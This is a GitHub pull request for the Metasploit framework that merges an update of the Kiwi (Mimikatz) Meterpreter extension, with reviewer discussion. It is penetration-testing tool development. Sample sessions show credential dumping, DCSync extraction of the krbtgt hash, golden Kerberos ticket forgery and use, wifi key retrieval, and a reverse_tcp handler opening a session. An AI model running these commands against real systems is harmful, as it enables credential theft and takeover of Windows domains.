Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Revamp Kiwi to work off Mimikatz subrepo #7744

Merged
merged 16 commits into from Dec 29, 2016

Conversation

Projects
None yet
7 participants
@OJ
Copy link
Contributor

OJ commented Dec 23, 2016

This PR requires changes made in the Meterpreter PR here: rapid7/metasploit-payloads#160

The long awaited Kiwi update is here. This PR contains code that makes use of the new updates to the kiwi extension, which now works of Mimikatz as a subrepo and supports all the new whiz bang features that @gentilkiwi has added in v2.1.

From here, exposing new Mimikatz features that Ben builds should be rather trivial! Hooray for more frequent updates.

This should work on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016.

Details

  • The creds_livessp command isn't available at this point because it doesn't seem to be used.
  • All the other creds_* commands should work like they used to, with slightly different output.
  • The kiwi API has changed a little bit, but that's not too interesting.
  • The golden_ticket module has been updated to use the new API
  • New commands have been added to make use of new features.
  • dcsync is a straight dump from mimikatz, and dcsync_ntlm does some rudimentary parsing for the sake of easy scripting, but they both use the same thing behind the scenes.
  • Listing of kerb tickets no long supports exporting. No biggie though.
  • Golden tickets are now stored in base64 format.
  • kiwi_cmd lets you fire a custom command directly at mimikatz. Be careful with this!
  • lsa_dump has been split into lsa_dump_secrets and lsa_dump_sam.

Sample run

meterpreter > use kiwi 


  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > ?
... snip ...
Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username          Domain  LM                                NTLM
--------          ------  --                                ----
Administrator     CORP    <redacted>  <redacted>
WIN-NDGU3JDSJE3$  CORP    <redacted>  <redacted>
oj                CORP    <redacted>  <redacted>

ssp credentials
===============

Username  Domain  Password
--------  ------  --------
oj        CORP    <redacted>

wdigest credentials
===================

Username          Domain  Password
--------          ------  --------
(null)            (null)  (null)
Administrator     CORP    <redacted>
WIN-NDGU3JDSJE3$  CORP    <redacted>
oj                CORP    <redacted>

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  CORP    <redacted>
oj             CORP    <redacted>

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
Administrator     CORP.PWND.LOCAL  <redacted>
win-ndgu3jdsje3$  CORP.PWND.LOCAL  <redacted>


meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] Running as SYSTEM, function will not work.
meterpreter > rev2self 
meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] NTLM hash for krbtgt missing, using <redacted> extracted from CORP\krbtgt
[!] Domain SID missing, using <redacted> extracted from SID of CORP\krbtgt
[+] Golden Kerberos ticket written to /tmp/ticket
meterpreter > background
[*] Backgrounding session 3...
msf exploit(handler) > sess 4
[*] Starting interaction with 4...

meterpreter > use kiwi 


  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > kerberos_ticket_use /tmp/ticket
[*] Using Kerberos ticket stored in /tmp/ticket, 1912 bytes ...
[+] Kerberos ticket applied successfully.
meterpreter > kerberos_ticket_list 
[+] Kerberos tickets found in the current session.
[00000000] - 0x00000017 - rc4_hmac_nt      
   Start/End/MaxRenew: 12/23/2016 9:52:42 AM ; 12/21/2026 9:52:42 AM ; 12/21/2026 9:52:42 AM
   Server Name       : krbtgt/CORP.PWND.LOCAL @ CORP.PWND.LOCAL
   Client Name       : Administrator @ CORP.PWND.LOCAL
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

meterpreter > dcsync
Usage: dcsync <DOMAIN\user>

meterpreter > dcsync 'CORP\oj'
[DC] 'corp.pwnd.local' will be the domain
[DC] 'WIN-68DAJU5BIFF.corp.pwnd.local' will be the DC server
[DC] 'CORP\oj' will be the user account

Object RDN           : oj

** SAM ACCOUNT **

SAM Username         : oj
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 1/1/1601 10:00:00 AM
Password last change : 12/20/2016 11:52:31 AM
Object Security ID   : <redacted>
Object Relative ID   : 1000

Credentials:
  Hash NTLM: <redacted>

meterpreter > dcsync_ntlm 'CORP\krbtgt'
[+] Account   : CORP\krbtgt
[+] NTLM Hash : <redacted>
[+] LM Hash   : <redacted>
[+] SID       : <redacted>
[+] RID       : 502

This was run on a Windows 7 machine talking to a Windows 2016 DC. This also works on Windows 10 based on my testing.

Verification

You're going to need a domain and a pleb machine connected to the domain.

  • Create two Meterpreter sessions on the target, with the right architecture. One session as Admin, one as a pleb user.
  • Switch to SYSTEM and run all the creds commands, make sure they work.
  • Run the lsa dump commands, make sure they work.
  • Create a golden ticket with the admin session (you'll need to rev2self).
  • Apply it so the pleb session.
  • Verify that the pleb session has the ticket by listing kerb tickets.
  • Check the new commands and make sure they behave.
  • Also get a session on a machine that has wifi profiles, and check the wifi dump command still works.

Thanks

As always, @gentilkiwi did the hard yards here, for doing dev on the fly to help me out, and for helping me realise my stupidity in certain areas.

OJ added some commits Aug 2, 2016

@mubix

This comment has been minimized.

Copy link
Contributor

mubix commented Dec 23, 2016

I don't understand this part:

meterpreter > golden_ticket_create -u 'CORP\Administrator' -d CORP.PWND.LOCAL -t /tmp/ticket
[!] Running as SYSTEM, function will not work.

Shouldn't you be able to create a Golden Ticket literally on any box and in any context with the right set of information?

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Dec 23, 2016

@mubix from the testing I did, it didn't work under the context of the SYSTEM user, which is why I added that check.

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Dec 23, 2016

Could have just been me being stupid though ;)

@void-in

This comment has been minimized.

Copy link
Contributor

void-in commented Dec 23, 2016

@OJ It might be that in SYSTEM context you are not able to read CORP\krbtgt which has the NTLM hash and domain SID. When you rev2self, you have the user account which is in hold of the kerberos ticket and hence kiwi is able to extract those fields.

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Dec 23, 2016

That's a good point! The DCsync call might be the issue here. I will adjust this module so that if the dcsync call has to be made it checks for SYSTEM. Otherwise, we'll just push on head.

Thank you @void-in .

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Dec 23, 2016

meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL
[!] NTLM hash for krbtgt missing, using <redacted> extracted from CORP\krbtgt
[!] Domain SID missing, using <redacted> extracted from SID of CORP\krbtgt
[+] Golden Kerberos ticket written to /tmp/zing
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL
[!] Unable to run module as SYSTEM unless krbtgt and domain sid are provided
meterpreter > golden_ticket_create -u 'CORP\Administrator' -t /tmp/zing -d CORP.PWND.LOCAL -s <redacted> -k <redacted>
[+] Golden Kerberos ticket written to /tmp/zing

There we go. Thanks @void-in, you were spot on.

@bcook-r7 bcook-r7 self-assigned this Dec 29, 2016

@bcook-r7

This comment has been minimized.

Copy link
Contributor

bcook-r7 commented Dec 29, 2016

obviously needed to verify that this works as well:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

I wasn't able to find a machine that had wifi immediately, but am not going to block on that - landing!

@bcook-r7 bcook-r7 merged commit 99da91e into rapid7:master Dec 29, 2016

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

bcook-r7 added a commit that referenced this pull request Dec 29, 2016

@bcook-r7

This comment has been minimized.

Copy link
Contributor

bcook-r7 commented Dec 29, 2016

Have fun guys, thanks again @OJ !

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Dec 29, 2016

Thank you @bcook-r7 👍 👍 👍 👍 👍 👍 👍 👍 👍 👍 👍

@OJ OJ deleted the OJ:kiwi-update branch Dec 29, 2016

@bcook-r7

This comment has been minimized.

Copy link
Contributor

bcook-r7 commented Dec 30, 2016

My pleasure, this was a big lift!

@bcook-r7

This comment has been minimized.

Copy link
Contributor

bcook-r7 commented Dec 30, 2016

Release Notes

The long awaited Kiwi update is here. This Meterpreter now makes use of the new updates to the kiwi extension, which now imports the latest Mimikatz release and supports all the new whiz bang features that @gentilkiwi has added in v2.1. Moving forward, updates should be much easier to port to Meterpreter in the future. The kiwi extension now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016.

Details

  • The creds_livessp command isn't available at this point because it doesn't seem to be used.
  • All the other creds_* commands should work like they used to, with slightly different output.
  • The golden_ticket module has been updated to use the new API
  • New commands have been added to make use of new features.
  • dcsync is a straight dump from mimikatz, and dcsync_ntlm does some rudimentary parsing for the sake of easy scripting, but they both use the same thing behind the scenes.
  • Listing of kerb tickets no long supports exporting. No biggie though.
  • Golden tickets are now stored in base64 format.
  • kiwi_cmd lets you fire a custom command directly at mimikatz. Be careful with this!
  • lsa_dump has been split into lsa_dump_secrets and lsa_dump_sam.
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Jan 3, 2017

Wifi Testing

msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set port 4567
port => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_Pro_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_Pro_IP>:50261) at 2017-01-03 13:13:32 -0600

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > use kiwi
Loading extension kiwi...

  .#####.   mimikatz 2.1 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

success.
meterpreter > wifi_list

Atheros AR9271 Wireless Network Adapter - {6561627b-3639-6635-612d-613537352d34}
================================================================================

Name          Auth     Type        Shared Key
----          ----     ----        ----------
Wireless2Ghz  WPA2PSK  passPhrase  <PASSPHRASE>

State: Connected

meterpreter > 

@OJ

This comment has been minimized.

Copy link
Contributor Author

OJ commented Jan 3, 2017

@pyllyukko

This comment has been minimized.

Copy link
Contributor

pyllyukko commented Mar 10, 2017

Is there plans to add Metasploit credential store support to this extension? It would be super useful, if e.g. dcsynced hashes would go directly to the creds database.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.